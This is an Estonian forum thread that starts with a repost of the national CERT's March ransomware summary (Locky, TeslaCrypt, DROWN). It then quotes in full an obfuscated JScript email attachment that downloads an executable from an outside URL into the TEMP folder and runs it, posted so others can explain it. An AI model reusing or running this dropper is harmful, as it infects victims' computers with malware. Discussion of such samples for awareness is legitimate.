[Tanel]

Möödunud kuul jätkus Eesti küberruumis lunavara levik. Ennekõike olid liikvel Locky ja TeslaCrypt, millest viimane muutus märtsis ka senisest keerukamaks.

Märtsis tutvustasime lunavaraohtu ka rahvusringhäälingus, mille tulemusel on CERTile lunavarast veelgi enam teada antud.
CERT-EEga on jagatud ka üht tarkvara, mis saadi kurjategijalt lunaraha maksmise järel ja mille abil õnnestus andmed tagasi saada.
Oluline oli kindlasti ka Drown-tüüpi turvavea avastamine veebilehtede juures kasutatavas krüptograafias. Sellest oli mõjutatud 12 090 .ee laiendiga veebilehte.

Loe küberturvalisuse teenistuse märtsikuu kokkuvõtet (.pdf, 95 KB)

Allikas: https://www.ria.ee/ee/martsis-hakkas-eestis-levima-keerukam-teslacrypt.html

[olavsu1]

http://www.elfafoorum.ee/threads/76857-Kahtlane-Javascript

seal kah üks näide, kuidas nood pahalased üritavad levida.... mõni oskaja võiks vaadata

Spoiler

Starfish kirjutas:

Käisin Hot.ee postkastis prügi kustutamas ja oli ühe meiliga manus kaasas, zip failis oli .js fail. Jawascript on minule võõras, äki keegi oskab ära seletada mida see tegema peaks. Sisu on selline: var _J1 = false; var _OG = "CreateObject"; var _IZ = function _K() {return WScript[_OG]("WScript"+".Shell");}(), _D = 11; var _WE = "MSXML2.XMLHTTP"; var _UK = 2123213; var _XE = 0; function _Y(_G){_IZ["Run"](_G, _XE, _XE);}; function _B(){return _WE + "";}; function _J(_DA, _M){_XE = _XE * 1; return _DA - _M;}; function _F(){return _OG;}; /*@cc_on @if (@_win32 || @_win64) _J1 = true; @end @*/ if (_J1) { var _TS = ""; function _YJ(){return 22;}; var _A0 = 0; var _J0 = 0; function _H() { var _W1 = new this["Date"](); var _S = _W1["getUTCMilliseconds"](); WScript["Sleep"](_YJ()); var _W1 = new this["Date"](); var _C = _W1["getUTCMilliseconds"](); WScript["Sleep"](_YJ()); var _W1 = new this["Date"](); var _X = _W1["getUTCMilliseconds"](); var _A0 = "_O"; _A0 = _J(_C, _S); var _J0 = "_Q"; _J0 = _J(_X, _C); _TS = "open"; return _J(_A0, _J0); } var _G0 = false; var _IA = false; for (var _A = _XE; _A < _YJ() * 1; _A++){if (_H() != _XE){ _G0 = true; _J0 = "31" + 11 * _A0 + _J0; _IA = true; break; }} function _N() {return ((_G0 == true) && (_G0 == _IA)) ? 1 : _XE;}; if (_G0 && _N() && _IA){ function _YU() {return _IZ["ExpandEnvironmentStrings"]("%TE"+"MP%/") + "3YQBBf85gS.ex" + "e";}; _RS = _B(); _H0 = WScript[_OG](_RS); var _EB = 1; while (_EB){ try { if (_EB == 1) { _H0[_TS]("GET", "http://assura-courtage.org/j2osla", false); _H0["send"](); _W0 = "Sleep"; } WScript[_W0](_YJ() + 120); if (_H0["readystate"] < 2 * 2) continue; _EB = _XE; function _VV(_Z) {var _W = (1, 2, 3, 4, 5, _Z); return _W;}; _O0 = WScript[_F()]("ADODB.Stream"); _RS = _O0; _RS[_TS](); _RS["type"] = _VV(1); _RS["write"](_H0["ResponseBody"]); _O0["position"] = _VV(_XE); _RS["Save" + "ToFile"](_YU(), 2); _O0["cl"+"ose"](); _Y0 = _YU(); _Y(_Y0); } catch(_CK){}; } } } Midagi on siin ka äratuntavat: Win32/64 tuvastamine, UTC aja tuvastamine, "ExpandEnvironmentStrings" TE+MP=TEMP ja [/color]3YQBBf85gS.ex+e = 3YQBBf85gS.exe. Temp kataloogi asukoha päring ja fail 3YQBBf85gS.exe. Millegi "http://assura-courtage.org/j2osla" aadressile saatmine ?

[LKits]

Avast peksab selle nime mainimise peale juba erroreid Ehk siis seda foorumiteemat ei saa lugeda Avast viirusetõrjega

[olavsu1]

LKits, just eelmises postituses spoileris on üks "jutt" mis võib igasugu häireid põhjustada...

[Wiltz]

see üks näide peaks vist olema too "your computer is going to sleep in 30 seconds" bullshit, mille suvalisel hetkel windoozas ette viskas ja justkui midagi teha ei saanudki? mingivahe mul lendas kah isiklikus arvutis selline asi ette, mäletan, et sai kuskilt mingi fail vist üles otsitud ja elimineeritud...aga ei mäleta või siis lihtsalt ei tea, et mida täpsemalt see pahalane veel niiväga paha tegi frustrating oleks muidugi kui elimineeritud ei saa...

[LKits]

[ThedEviL]

[LKits]

Mitte-käivitamise-võimekus ehk nii öelda "kompillaator" (ja/või viirusetõrjed) takistavad käivitamast.

Siin pigem tekib küsimus - miks see üldse lubatud on?

[degreal]

Ei tahaks uskuda, et me oleme javascriptiga ActiveX ajas tagasi, kus valele lehele sattudes said plaksti viiruse.

[mahno]

Flashiga me juba oleme selles ajas tagasi päris pikalt.